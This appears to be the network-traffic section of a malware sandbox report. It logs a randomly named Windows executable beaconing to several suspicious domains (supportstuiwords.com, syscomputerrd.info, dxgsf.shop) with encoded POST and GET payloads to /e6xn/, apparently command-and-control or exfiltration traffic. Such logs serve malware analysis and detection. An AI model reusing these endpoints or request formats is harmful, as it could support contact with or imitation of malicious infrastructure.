                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:48:20.193871975 CET | 775 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.supportstuiwords.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.supportstuiwords.com
                                                                                  Referer: http://www.supportstuiwords.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=pxBfZM6EF63M9RTZwdFtzPzXvdFzVERIdPSzL++WoffetAdBkP5V4s9CTvf+USIngxwh//G48MBtNdDDx8Ip8zyrmBlLnwSLiE/q269GE4Msl3zwxsP3iy0Jw7VfdvUCv0L5hkQXi0AyNDCMmHZyLPjRBU+9AC788kgpIhOdndwf+PQki8Vx9TLESoTI
                                                                                  Mar 18, 2024 14:48:20.349200010 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:48:20 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  34 | 192.168.2.10 | 49750 | 154.7.21.55 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:48:22.873090982 CET | 799 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.supportstuiwords.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.supportstuiwords.com
                                                                                  Referer: http://www.supportstuiwords.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=pxBfZM6EF63MySbZy8FtxvzYzNFzA0RydOuzL6nToN7etgNBrrtV2M9CKffieyI8gx8f//q48MVtNczDxL0q+jyp9xlJpQSLiE/q26B4E4Us5XvwyPXwoS0K4bVfZvUGv0LHhl89iyMyNCyMmVx1CPjbNE/2PxCem3ApFTGt4fkDwOxjzt0mukXKcumiSML92FxCyeASwnDvrXYEeA==
                                                                                  Mar 18, 2024 14:48:23.029356956 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:48:22 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  35 | 192.168.2.10 | 49751 | 154.7.21.55 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:48:25.558198929 CET | 1812 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.supportstuiwords.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.supportstuiwords.com
                                                                                  Referer: http://www.supportstuiwords.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:48:25.712778091 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:48:25 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  36 | 192.168.2.10 | 49752 | 154.7.21.55 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:48:28.230214119 CET | 506 | OUT | GET /e6xn/?bvOt=kzp/a47TZoeooijf6PAMz/PnwNMdJTtRUuOJK4qo3trrvBMD8vtq5KxCd9qMSTo59iVH98TL2IBESMiQybod0ACy6WBPglHFi3698tluOY189mrwzA==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.supportstuiwords.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:48:28.384726048 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:48:28 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  37 | 192.168.2.10 | 49753 | 50.6.160.34 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:48:33.723190069 CET | 769 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.syscomputerrd.info
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.syscomputerrd.info
                                                                                  Referer: http://www.syscomputerrd.info/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=4W84EwGALNAfYgrdfcCGy6KrZO5SgxTcZf3aH0iNu99vK2Im49njcWj28hQ1w4bgE2urYPbg+G9Vxe8d6+8Ex62VbQvAAD1L4Ma/7gpMp2QBvffnQ7Q6/Kn9Kc0nUV/ncctIPWEoKgib9d7zxeyvxUCDURtNlkaS3pDDzCH3QEr6yHoNrRlJ/9e3G/as
                                                                                  Mar 18, 2024 14:48:34.158616066 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 18 Mar 2024 13:48:33 GMT
                                                                                  Server: Apache
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                  Link: <https://hzw.avt.temporary.site/wp-json/>; rel="https://api.w.org/"
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  X-Endurance-Cache-Level: 2
                                                                                  X-nginx-cache: WordPress
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  38 | 192.168.2.10 | 49754 | 50.6.160.34 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:48:36.357367039 CET | 793 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.syscomputerrd.info
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.syscomputerrd.info
                                                                                  Referer: http://www.syscomputerrd.info/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=4W84EwGALNAfYBbdSeqGlKKkHe5S7BTYZfzaH1nWtPpvKUQm55LjbWj20BQw9Yb+E2SJYOLg+G5VxcUd9JQFwq2LDgvCPj1L4Ma/7kBmp30BuvvnTfk12qn+aM0nQV/7ccsbPXpFKjWb9YHz2Leo7UCFQRsu22nH/o3wrDS6BSrt8GJK6AEesKC5I5vGk3ztTfWpHCQeY/ycUv0wzg==
                                                                                  Mar 18, 2024 14:48:36.771097898 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 18 Mar 2024 13:48:36 GMT
                                                                                  Server: Apache
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                  Link: <https://hzw.avt.temporary.site/wp-json/>; rel="https://api.w.org/"
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  X-Endurance-Cache-Level: 2
                                                                                  X-nginx-cache: WordPress
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.10 | 49755 | 50.6.160.34 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:48:38.999963045 CET | 1806 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.syscomputerrd.info
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.syscomputerrd.info
                                                                                  Referer: http://www.syscomputerrd.info/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Mar 18, 2024 14:48:39.402846098 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 18 Mar 2024 13:48:39 GMT
                                                                                  Server: Apache
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                  Link: <https://hzw.avt.temporary.site/wp-json/>; rel="https://api.w.org/"
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  X-Endurance-Cache-Level: 2
                                                                                  X-nginx-cache: WordPress
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.10 | 49756 | 50.6.160.34 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:48:41.640264988 CET | 504 | OUT | GET /e6xn/?bvOt=1UUYHFL4LdVgOiboeMjc0IWbZOVr8VDrWpD/OUuuls53JWREudPDYQ+nxzsCxMG6BUvSIs7k/B5ZpvZv05F76qqNcXO9IRc03t2/8HV/ry1cldLuRw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.syscomputerrd.info
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Mar 18, 2024 14:48:42.117407084 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 18 Mar 2024 13:48:42 GMT
                                                                                  Server: nginx/1.23.4
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                  Link: <https://hzw.avt.temporary.site/wp-json/>; rel="https://api.w.org/"
                                                                                  Vary: Accept-Encoding
                                                                                  X-Endurance-Cache-Level: 2
                                                                                  X-nginx-cache: WordPress
                                                                                  Transfer-Encoding: chunked
                                                                                  Data Ascii: 390<!DOCTYPE html><html lang="es"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><title>Page not found - MOVIMIENTO JUVENTUD COMUNITARIA</title><meta property="og:locale" content="es_ES" /><meta property="og:title" content="Page not found - MOVIMIENTO JUVENTUD COMUNITARIA" /><meta property="og:site_name" content="MOVIMIENTO JUVENTUD COMUNITARIA" /> <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://hzw.avt.temporary.site/#website","url":"https://hzw.avt.temporary.site/","name":"MOVIMIENTO JUVENTUD COMUNITARIA","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://hzw.avt.temporary.si
Mar 18, 2024 14:48:42.117503881 CET | 31 | IN
                                                                                  Data Ascii: te/?s={search_term_string}"},
Mar 18, 2024 14:48:42.117686033 CET | 1286 | IN
                                                                                  Data Ascii: 1ffa"query-input":"required name=search_term_string"}],"inLanguage":"es"}]}</script> <link rel='dns-prefetch' href='//hzw.avt.temporary.site' /><link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /><link href='https://fonts.gstatic.com
                                                                                  Mar 18, 2024 14:48:42.117790937 CET1286INData Raw: 39 4f 4c 6e 4e 30 63 6d 6c 75 5a 32 6c 6d 65 53 68 30 4b 53 6c 39 59 32 46 30 59 32 67 6f 5a 53 6c 37 66 58 31 6d 64 57 35 6a 64 47 6c 76 62 69 42 77 4b 47 55 73 64 43 78 75 4b 58 74 6c 4c 6d 4e 73 5a 57 46 79 55 6d 56 6a 64 43 67 77 4c 44 41 73
                                                                                  Data Ascii: 9OLnN0cmluZ2lmeSh0KSl9Y2F0Y2goZSl7fX1mdW5jdGlvbiBwKGUsdCxuKXtlLmNsZWFyUmVjdCgwLDAsZS5jYW52YXMud2lkdGgsZS5jYW52YXMuaGVpZ2h0KSxlLmZpbGxUZXh0KHQsMCwwKTt2YXIgdD1uZXcgVWludDMyQXJyYXkoZS5nZXRJbWFnZURhdGEoMCwwLGUuY2FudmFzLndpZHRoLGUuY2FudmFzLmhlaWdod
                                                                                  Mar 18, 2024 14:48:42.117903948 CET1286INData Raw: 63 6a 30 69 64 57 35 6b 5a 57 5a 70 62 6d 56 6b 49 69 45 39 64 48 6c 77 5a 57 39 6d 49 46 64 76 63 6d 74 6c 63 6b 64 73 62 32 4a 68 62 46 4e 6a 62 33 42 6c 4a 69 5a 7a 5a 57 78 6d 49 47 6c 75 63 33 52 68 62 6d 4e 6c 62 32 59 67 56 32 39 79 61 32
                                                                                  Data Ascii: cj0idW5kZWZpbmVkIiE9dHlwZW9mIFdvcmtlckdsb2JhbFNjb3BlJiZzZWxmIGluc3RhbmNlb2YgV29ya2VyR2xvYmFsU2NvcGU/bmV3IE9mZnNjcmVlbkNhbnZhcygzMDAsMTUwKTppLmNyZWF0ZUVsZW1lbnQoImNhbnZhcyIpLGE9ci5nZXRDb250ZXh0KCIyZCIse3dpbGxSZWFkRnJlcXVlbnRseTohMH0pLG89KGEudGV
                                                                                  Mar 18, 2024 14:48:42.118127108 CET1286INData Raw: 52 35 63 47 56 76 5a 69 42 43 62 47 39 69 4b 58 52 79 65 58 74 32 59 58 49 67 5a 54 30 69 63 47 39 7a 64 45 31 6c 63 33 4e 68 5a 32 55 6f 49 69 74 6d 4c 6e 52 76 55 33 52 79 61 57 35 6e 4b 43 6b 72 49 69 67 69 4b 31 74 4b 55 30 39 4f 4c 6e 4e 30
                                                                                  Data Ascii: R5cGVvZiBCbG9iKXRyeXt2YXIgZT0icG9zdE1lc3NhZ2UoIitmLnRvU3RyaW5nKCkrIigiK1tKU09OLnN0cmluZ2lmeShzKSx1LnRvU3RyaW5nKCkscC50b1N0cmluZygpXS5qb2luKCIsIikrIikpOyIscj1uZXcgQmxvYihbZV0se3R5cGU6InRleHQvamF2YXNjcmlwdCJ9KSxhPW5ldyBXb3JrZXIoVVJMLmNyZWF0ZU9ia
                                                                                  Mar 18, 2024 14:48:42.118204117 CET1286INData Raw: 68 7a 77 2e 61 76 74 2e 74 65 6d 70 6f 72 61 72 79 2e 73 69 74 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 61 75 74 6f 70 74 69 6d 69 7a 65 2f 61 75 74 6f 70 74 69 6d 69 7a 65 5f 73 69 6e 67 6c 65 5f 62 35 34 38 64 62 61 63 62 32 64
                                                                                  Data Ascii: hzw.avt.temporary.site/wp-content/cache/autoptimize/autoptimize_single_b548dbacb2dd74a277220ed09258ed2b.php?ver=1.1' type='text/css' media='all' /><link rel='stylesheet' id='sbi_styles-css' href='http://hzw.avt.temporary.site/wp-content/plugin
                                                                                  Mar 18, 2024 14:48:42.118290901 CET1286INData Raw: 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 7b 6d 61 72 67 69 6e 3a 30 20 30 20
                                                                                  Data Ascii: e .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}.wp-block-image figcapti
                                                                                  Mar 18, 2024 14:48:42.118328094 CET478INData Raw: 64 29 7b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 63 73 73 2d 6f 70 61 63 69 74 79 7b 6f 70 61 63 69 74 79 3a 2e 34 7d 2e 77 70 2d 62 6c 6f 63 6b
                                                                                  Data Ascii: d){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not
                                                                                  Mar 18, 2024 14:48:42.118458033 CET1286INData Raw: 61 38 32 0d 0a 6c 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 68 7b 77 6f 72 64 2d 62 72 65 61 6b 3a 6e 6f 72 6d 61 6c 7d 2e 77 70
                                                                                  Data Ascii: a82le{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaptio
                                                                                  Mar 18, 2024 14:48:42.227731943 CET1286INData Raw: 67 69 6e 3a 30 20 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 65 34 77 70 2d 73 75 62 73 63 72 69 62 65 20 2e 66 69 72 73 74 4e 61 6d 65 53 75 6d 6d 61 72 79 20 2e 6c 61 73 74 4e 61 6d 65 53 75 6d 6d 61 72 79 7b 74 65 78 74 2d 74 72 61 6e 73
                                                                                  Data Ascii: gin:0 auto}.wp-block-ce4wp-subscribe .firstNameSummary .lastNameSummary{text-transform:capitalize}.wp-block-ce4wp-subscribe .ce4wp-inline-notification{display:flex;flex-direction:row;align-items:center;padding:13px 10px;width:100%;height:40px;


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  41 | 192.168.2.10 | 49757 | 103.197.25.241 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:49:00.929116964 CET | 745 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.dxgsf.shop
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.dxgsf.shop
                                                                                  Referer: http://www.dxgsf.shop/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=5tgX0l4DSqupOme0rANOuhjezM1kurU/W9DUJn1JEw9D387qgrSTJL3l5YLLqlHrE9aUFtgQIxf7NHNPEbSVJLK+dfzJQCoSeB1fCmhdN0d5fxx53gS23ruLtU8qRWjwLA3sOd1nA5gurien024eFwU30z7zTWrij85lQ12HqE8n1WcGaktOaPScUVI8
                                                                                  Mar 18, 2024 14:49:01.228142977 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:49:01 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  42 | 192.168.2.10 | 49758 | 103.197.25.241 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:49:03.754472017 CET | 769 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.dxgsf.shop
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.dxgsf.shop
                                                                                  Referer: http://www.dxgsf.shop/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=5tgX0l4DSqupcVW0ohNO+xjR2M1k0bU7W9fUJiFZHCpDwdLqhu+TKL3lx4LCkFHaE8mmFpoQIxL7NG9PDqSKLbK8V/zLPSoSeB1fCm1zN0F5fBB53C61r7uIok8qDmj0LA2LOfBNA7ournin0n4fMwU1pj7tCHXn6OscQT6soCoQ/X9BL1MZJ4OSaT9Wv3fMd38Z18y/tGQNX5O27w==
                                                                                  Mar 18, 2024 14:49:04.059365988 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:49:03 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  43 | 192.168.2.10 | 49759 | 103.197.25.241 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:49:06.575608015 CET | 1782 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.dxgsf.shop
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.dxgsf.shop
                                                                                  Referer: http://www.dxgsf.shop/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:49:06.872243881 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:49:06 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
